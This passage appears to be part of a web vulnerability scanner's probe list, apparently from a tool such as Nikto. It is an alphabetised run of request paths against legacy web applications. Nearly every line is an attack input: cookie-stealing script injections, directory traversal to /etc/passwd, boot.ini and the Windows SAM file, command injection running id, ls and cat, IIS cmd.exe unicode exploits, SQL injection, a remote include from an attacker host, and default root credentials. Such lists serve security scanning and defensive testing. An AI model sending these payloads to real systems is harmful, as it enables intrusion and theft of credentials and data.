forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
foto/
fotos/
foxweb.dll
foxweb.exe
fpadmin/
fpdb/shop.mdb
fpsrvadm.exe
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
ftp.pl
ftp/
ftpsh
functions.inc.php+
gH.cgi
gallery/captionator.php
gallery/errors/configmode.php
gallery/errors/needinit.php
gallery/errors/reconfigure.php
gallery/errors/unconfigured.php
gallery/index.php?include=../../../../../../../../../etc/passwd
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
gb/index.php?login=true
gbadmin.cgi?action=change_adminpass
gbadmin.cgi?action=change_automail
gbadmin.cgi?action=colors
gbadmin.cgi?action=setup
gbook/gbook.cgi?_MAILTO=xx;ls
gbpass.pl
geeklog/users.php
general.chl+
generate.cgi?content=../../../../../../../../../../etc
generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
generate.cgi?content=../../../../../../../../../../windows
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../../winnt
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
get32.exe
get_od_toc.pl
getaccess
getdoc.cgi
gettransbitmap
gfx/
glimpse
global.asa
global.inc
global/
globals.jsa
globals.php3
globals.pl
gm-authors.cgi
gm-cplog.cgi
gm.cgi
goform/CheckLogin?login=root&password=tslinux
graphics/
group.nsf
groups.nsf
guest/
guestbook.cgi
guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
guestbook.pl
guestbook/
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
guestbook/admin.php
guestbook/admin/o12guest.mdb
guestbook/guestbook.html
guestbook/passwd
guests/
handler.cgi
hello.bat?&dir+c:\\
help.html
help.php?chapter=<script>alert('Vulnerable')</script>
help/contents.htm
help/domguide.nsf
help/dspug.nsf
help/help4.nsf
help/helpadmin.nsf
help/helplt4.nsf
help/home.html
help/internet.nsf
help/javapg.nsf
help/lccon.nsf
help/migrate.nsf
help/npn_admn.nsf
help/npn_rn.nsf
help/readmec.nsf
help/readmes.nsf
help/smhelp.nsf
help/srvinst.nsf
help4.nsf
help5_admin.nsf
help5_client.nsf
help5_designer.nsf
helpadmin.nsf
helperfunction.php
helplt4.nsf
hidden.nsf
hidden/
hit_tracker/
hitmatic/
hitmatic/analyse.cgi
hits.txt
hitview.cgi
home.php?arsc_language=elvish
home/
homebet/homebet.dll?form=menu&amp;option=menu-signin
homepage.nsf
homepage/
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
horde/test.php
horde/test.php?mode=phpinfo
hostadmin/?page='
hostingcontroller/
hp-ux/
hp/device/this.LCDispatcher
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
hpnst.exe?c=p+i=SrvSystemInfo.html
hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
hsx.cgi?show=../../../../../../../../../../../passwd%00
ht_root/wwwroot/-/local/httpd$map.conf
htdocs/
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
htgrep?file=index.html&hdr=/etc/passwd
htimage.exe
htimage.exe/path/filename?2,2
html/
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
html/cgi-bin/cgicso?query=AAA
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html2chtml.cgi
html2wml.cgi
htmlscript?../../../../../../../../../../etc
htmlscript?../../../../../../../../../../etc/passwd
htmltonuke.php
htpasswd
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?exclude=%60/etc/passwd%60
https-admserv/bin/index?/<script>alert(document.cookie)</script>
hyperstat/stat_what.log
i?/etc/passwd
iNotes/Forms5.nsf
iNotes/Forms5.nsf/$DefaultNav
ibill.pm
ibill/
icat
icons/
idea/
idealbb/error.asp?|-|0|404_Object_Not_Found
ideas/
if/admin/nph-build.cgi
iisadmin/
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
iishelp/iis/htm/tutorial/redirect.asp
iishelp/iis/misc/default.asp
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/Winmsdp.exe
iissamples/exair/howitworks/codebrws.asp
iissamples/exair/search/advsearch.asp
iissamples/exair/search/query.asp
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/exair/search/search.asp
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/SQLQHit.asp
iissamples/issamples/Winmsdp.exe
iissamples/issamples/codebrws.asp
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/ixqlang.htm
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/sqlqhit.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
ikonboard/help.cgi?
image/
imageFolio.cgi
imagefolio/admin/admin.cgi
imagemap
imagemap.exe
imagenes/
images/
images/?pattern=/etc/*&sort=name
img-sys/
img/
imgs/
imp/horde/test.php
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
import/
impreso/
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
inc/common.load.php
inc/config.php
inc/dbase.php
inc/sendmail.inc
include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
include/customize.php
include/help.php
include/new-visitor.inc.php
includes/
includes/adovbs.inc
includes/footer.php3
includes/header.php3
incoming/
index.html%20
index.html.ca
index.html.cz.iso8859-2
index.html.de
index.html.dk
index.html.ee
index.html.el
index.html.en
index.html.es
index.html.et
index.html.fr
index.html.he.iso8859-8
index.html.hr.iso8859-2
index.html.it
index.html.ja.iso2022-jp
index.html.kr.iso2022-kr
index.html.ltz.utf8
index.html.lu.utf8
index.html.nl
index.html.nn
index.html.no
index.html.po.iso8859-2
index.html.pt
index.html.pt-br
index.html.ru.cp-1251
index.html.ru.cp866
index.html.ru.iso-ru
index.html.ru.koi8-r
index.html.ru.utf8
index.html.se
index.html.tw
index.html.tw.Big5
index.html.var
index.js0x70
index.jsp%00x
index.php/123
index.php/\"><script><script>alert(document.cookie)</script><
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
index.php?IDAdmin=test
index.php?SqlQuery=test%20
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?base=test%20
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php?dir=<script>alert('Vulnerable')</script>
index.php?download=/etc/passwd
index.php?download=/windows/win.ini
index.php?download=/winnt/win.ini
index.php?err=3&email=\"><script>alert(document.cookie)</script>
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?file=index.php
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
index.php?module=My_eGallery
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?offset=[%20Problem%20Here%20]
index.php?option=search&searchword=<script>alert(document.cookie);</script>
index.php?page=../../../../../../../../../../boot.ini
index.php?page=../../../../../../../../../../etc/passwd
index.php?pymembs=admin
index.php?rep=<script>alert(document.cookie)</script>
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?sql_debug=1
index.php?tampon=test%20
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
index.php?vo=\"><script>alert(document.cookie);</script>
index.php?|=../../../../../../../../../etc/passwd
index.pl
info.php
info/
info2www
info2www '(../../../../../../../bin/mail root </etc/passwd>
informacion/
information/
infos/contact/index.asp
infos/faq/index.asp
infos/gen/index.asp
infos/services/index.asp
infosrch.cgi
ingresa/
ingreso/
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
instaboard/index.cfm
install/
install/install.php
instantwebmail/message.php
interchange/
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
internal.sws?../../../../../../../../winnt/win.ini
internal/
internet.nsf
interscan/
interscan/cgi-bin/FtpSave.dll?I'm%20Here
intranet/
intranet/browse.php
invitado/
invitados/
invitefriends.php3
ion-p.exe?page=c:\winnt\repair\sam
ion-p?page=../../../../../etc/passwd
ip.txt
ipchat.php
isapi/count.pl?
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
isqlplus
isx.html
ixmail_netattach.php
j2ee/
jailshell
jamdb/
java-plugin/
java-sys/
java/
javadoc/
javapg.nsf
javax
jdbc/
jgb_eng_php3/cfooter.php3
jigsaw/
jj
job/
jotter.nsf
journal.cgi?folder=journal.cgi%00
jrun/
js
jservdocs/
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
jspdocs/
jsptest.jsp+
junk.aspx
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
kbccv11.nsf
kbnv11.nsf
kbssvv11.nsf
kernel/class/delete.php
kernel/classes/ezrole.php
krysalis/
ksh
l_domlog.nsf
lastlines.cgi?process
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
lccon.nsf
lcgi/lcgitest.nlm
lcgi/ndsobj.nlm
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
lcon.nsf
ldap.nsf
ldap.search.php3?ldap_serv=nonsense%20
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
leiadm.nsf
leilog.nsf
leivlt.nsf
level/16
level/16/exec/
level/16/exec/-///pwd
level/16/exec/-///show/configuration
level/16/exec//show
level/16/exec//show/access-lists
level/16/level/16/exec//show/configuration
level/16/level/16/exec//show/interfaces
level/16/level/16/exec//show/interfaces/status
level/16/level/16/exec//show/running-config/interface/FastEthernet
level/16/level/16/exec//show/version
level/17/exec//show
level/18/exec//show
level/19/exec//show
level/20/exec//show
level/21/exec//show
level/22/exec//show
level/23/exec//show
level/24/exec//show
level/25/exec//show
level/26/exec//show
level/27/exec//show
level/28/exec//show
level/29/exec//show
level/30/exec//show
level/31/exec//show
level/32/exec//show
level/33/exec//show
level/34/exec//show
level/35/exec//show
level/36/exec//show
level/37/exec//show
level/38/exec//show
level/39/exec//show
level/40/exec//show
level/41/exec//show
level/42/exec//show
level/42/exec/show%20conf
level/43/exec//show
level/44/exec//show
level/45/exec//show
level/46/exec//show
level/47/exec//show
level/48/exec//show
level/49/exec//show
level/50/exec//show
level/51/exec//show
level/52/exec//show
level/53/exec//show
level/54/exec//show
level/55/exec//show
level/56/exec//show
level/57/exec//show
level/58/exec//show
level/59/exec//show
level/60/exec//show
level/61/exec//show
level/62/exec//show
level/63/exec//show
level/64/exec//show
level/65/exec//show
level/66/exec//show
level/67/exec//show
level/68/exec//show
level/69/exec//show
level/70/exec//show
level/71/exec//show
level/72/exec//show
level/73/exec//show
level/74/exec//show
level/75/exec//show
level/76/exec//show
level/77/exec//show
level/78/exec//show
level/79/exec//show
level/80/exec//show
level/81/exec//show
level/82/exec//show
level/83/exec//show
level/84/exec//show
level/85/exec//show
level/86/exec//show
level/87/exec//show
level/88/exec//show
level/89/exec//show
level/90/exec//show
level/91/exec//show
level/92/exec//show
level/93/exec//show
level/94/exec//show
level/95/exec//show
level/96/exec//show
level/97/exec//show
level/98/exec//show
level/99/exec//show
lib/
library/
libro/
linux/
listrec.pl
livehelp/
livredor/index.php
loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
local/httpd$map.conf
localstart.asp
log-reader.cgi
log.htm
log.html
log.nsf
log.txt
log/
log/nether-log.pl?checkit
log4a.nsf
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
logfile
logfile.htm
logfile.html
logfile.txt
logfile/
logfiles/
logger.html
logger/
logging/
logicworks.ini
login.cgi
login.jsp
login.php3?reason=chpass2%20
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
login.pl
login.pl?course_id=\
login/
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
logins.html
logit.cgi
logjam/showhits.php
logs.pl
logs.txt
logs/
logs/access_log
logs/error_log
logs/str_err.log
lookwho.cgi
lost+found/
lpt9
lpt9.xtp
ls
lsxlc.nsf
lwgate
lwgate.cgi
mab.nsf
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
mail
mail.box
mail/
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
mail/adminisist.nsf
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
mail/include.html
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
mail/settings.html
mail/src/read_body.php
mail1.box
mail10.box
mail2.box
mail3.box
mail4.box
mail5.box
mail6.box
mail7.box
mail8.box
mail9.box
mailform.exe
mailit.pl
maillist.cgi
maillist.pl
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
mailman/listinfo
mailman/listinfo/<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
mailnews.cgi
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
mailw46.nsf
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
main_page.php
majordomo.pl
mall_log_files/order.log
mambo/administrator/phpinfo.php
mambo/banners.php
mambo/index.php?Itemid=JUNK(5)
man.sh
man2html
manage/cgi/cgiproc
manage/login.asp+
manager/
manager/html-manager-howto.html
manager/manager-howto.html
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
manual.php
manual/
manual/ag/esperfrm.htm
manual/images/
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
market/
marketing/
master.password
mastergate/search.cgi?search=0&search_on=all
mbox
mc-icons/
mcartfree/database/metacart.mdb
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
megabook/files/20/setup.db
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
members/
members/ID.pm
members/ID.xbb
message/
messaging/
meta.pl
metacart/database/metacart.mdb
mgrqcgi
midicart.mdb
migrate.nsf
mini_logger.cgi
minimal.exe
ministats/admin.cgi
misc/
mkilog.exe
mkplog.exe
mkstats/
mlog.html
mlog.phtml
mmstdod.cgi
mod.php
mod_ose_docs
modif/delete.php
modif/ident.php
modif_infos.asp?n=%60/etc/passwd%60
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
modif_infos.asp?n=/....../boot.ini
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
modif_infos.asp?n=/../../../../../../../../../etc/passwd
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
modif_infos.asp?n=/etc/passwd
modif_infos.asp?n=/etc/passwd%00
modif_infos.asp?n=c:\boot.ini
mods/apage/apage.cgi?f=file.htm.|id|
modsecurity.php
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownload
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Members_List&sql_debug=1
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
modules/Downloads/voteinclude.php+
modules/Forums/attachment.php
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/Search/index.php
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moin.cgi?test
mojo/mojo.cgi
moregroupware/modules/webmail2/inc/
movimientos/
mp3/
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
mqseries/
mrtg.cfg?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
msadc/msadcs.dll
msadc/samples/adctest.asp
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
msdwda.nsf
mspress30/
msql/
msword/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
multihtml.pl?multi=/etc/passwd%00html
musicqueue.cgi
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
myguestbook.cgi?action=view
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
na_admin/
na_admin/ataglance.html
namazu.cgi
names.nsf
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
nbmember.cgi?cmd=list_all_users
ncl_items.html
ncl_items.shtml?SUBJECT=1
ncommerce3/ExecMacro/macro.d2w/%0a%0a
ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
netauth.cgi?cmd=show&page=../../../../../../../../../../etc
netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
netbasic/websinfo.bas
netget?sid=Safety&amp;msg=2002&amp;file=Safety
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
nethome/
netpad.cgi
netscape/
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
new
new/
news
news/news.mdb
newsdesk.cgi?t=../../../../../../../../../../etc
newsdesk.cgi?t=../../../../../../../../../../etc/passwd
newtopic.php
newuser?Image=../../database/rbsserv.mdb
nikto.ida
nimages.php
nl/
nlog-smb.cgi
nlog-smb.pl
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
node/view/666\"><script>alert(document.domain)</script>
non-existent.pl
noshell
nosuchurl/><script>alert('Vulnerable')</script>
notes.nsf
noticias/
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
nphp/nphpd.php
npn_admn.nsf
npn_rn.nsf
ns-icons/
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
